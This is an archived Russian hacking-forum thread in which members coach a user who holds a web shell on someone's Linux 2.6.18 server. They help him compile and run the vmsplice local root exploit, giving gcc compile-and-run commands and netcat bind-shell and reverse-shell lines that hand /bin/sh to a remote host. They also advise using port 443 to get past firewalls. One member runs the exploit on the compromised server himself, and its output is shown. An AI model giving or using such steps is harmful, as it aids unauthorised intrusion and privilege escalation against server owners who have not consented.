PDA

Просмотр полной версии : Linux Kernel 2.6.18 vS Exploit


mailbrush
18.05.2009, 22:17
Есть у меня веб-шелл на серваке Linux Kernel 2.6.18 и сплоит под него - http://www.milw0rm.com/exploits/5092. Со сплоитами никогда не работал, поэтому задаю такой вопрос - как его откомпилить, имея только веб-шелл (права на запись есс-но есть, но только в текущей директории)?

Shaitan-Devil
18.05.2009, 22:20
Попробуй

gcc -o sploit sploit.c; chmod +x sploit;./sploit

НУ или

gcc -o sploit sploit.c; chmod 777 sploit;./sploit

ну или без chmod

gcc -o sploit sploit.c;./sploit

А вообще в интернете много статей.

mailbrush
18.05.2009, 22:28
Я видел на хакере точно такой же, только там $ был спереди, поэтому ничего не работало. Сейчас попробую.

Spyder
18.05.2009, 22:31
тебе как минимум надо получить нормальный шелл

mailbrush
18.05.2009, 22:35
У меня Веб-Шелл, а не SSH доступ, и gcc почему-то там не пашет. Я юзаю в eval()
system('gcc -o exploit exploit.c;');
PS: в линухе я полный 0

Shaitan-Devil
18.05.2009, 22:36
Нужно сделать бекконнект или забиндить порт.
П.С. Или нет?=\

oRb
18.05.2009, 22:44
PS: в линухе я полный 0
это чувствуется)
$ перед командой - это пояснение, что команды выполняются с правами обычного пользователя. # - с правами рута.
У меня Веб-Шелл, а не SSH доступ
забинди порт или сделай бек-конект.
gcc почему-то там не пашет
что выведет which gcc?

Spyder
18.05.2009, 23:03
which gcc cc cpp

бинди порт, например неткатом
nc -l -p 31337 -e /bin/sh &

потом у себя неткатом
nc -v www.site.com 31337

Если тебе очень повезло и фаер не блочит соединения тебя поприветствует оболчка шелла

В ином случае делай бекконект
у себя на дедике открываешь порт
nc -l -p 31337

на сервер который собираешься рутать
nc -v www.dedik.com 31337 -e /bin/sh &

Удачи =)

AkyHa_MaTaTa
18.05.2009, 23:12
Нет факт что:
-- на хосте присутсвует gcc(мало вероятно);
-- что у твоего блайнда хватит прав на доступ к gcc(более вероятно, как правило nobody и etc);
Скомпиль на локальной машине, скопирую(выстави права по необходимости) и запускай(не фактов тоже много).

Spyder
18.05.2009, 23:19
AkyHa_MaTaTa, уж если ему не хватит прав на gcc, то ещё более вероятно что там noexec ;)

mailbrush
18.05.2009, 23:33
Эх вы, "линуксоиды", мне до вас еще далеко... Надо читать, читать и еще раз читать, а лутше - самому линуху установить... Смотрите ПМ :)

Pashkela
19.05.2009, 00:57
Сначала пусть нормальный шелл или срипт бекконекта найдет, без всего этого шансов точно ноль

$n@ke
19.05.2009, 11:28
бекконект на порт 443, который предварительно освобождается на дедике(остановка службы https\SSL), проходит в 90% случаев..а дальше тебе уже понаписали.
зы: если ядро до 2008г, то шансы на рут есть,в противном случае - уменьшаются в геометрической прогрессии...

mailbrush
19.05.2009, 21:10
Мне уже юзер oRb объяснил, что сплоит не подходит под этот двиг, хотя в uname -a именно эта версия. Спасибо всем за ответы.

pampom
22.05.2009, 13:52
нужена оболочка с поддежкой псевдо терминала.

ph1l1ster
22.05.2009, 14:42
Мне уже юзер oRb объяснил, что сплоит не подходит под этот двиг, хотя в uname -a именно эта версия. Спасибо всем за ответы.

ещё как подходит!

https://forum.antichat.ru/showthread.php?t=30711

http://forum.xakep.ru/m_1073063/tm.htm

krypt3r
22.05.2009, 14:56
ядро 2.6.18 должно сдаться vmsplice-exploit. А компилится оно так
$ gcc -static -Wno-format -o vmsplice vmsplice.c

oRb
22.05.2009, 15:19
mailbrush дал мне свой шелл.
gcc там нет, поэтому сплойт собрал на другой тачке. Скачал, сменил чмод и запустил:
sh-3.2$ ./sp
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[-] mmap: Permission denied
sh-3.2$ uname -a
Linux ************** 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686 i686 i386 GNU/Linux
видимо ядро патченное.

krypt3r
22.05.2009, 15:30
не судьба =)

Grey
22.05.2009, 16:55
sh-3.2$ ./sp
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[-] mmap: Permission denied
sh-3.2$ uname -a
Linux ************** 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686 i686 i386 GNU/Linux
видимо ядро патченное.

По практике могу сказать что сплоент пробивает версии выпущенные ранее 12-14 февраля 2008.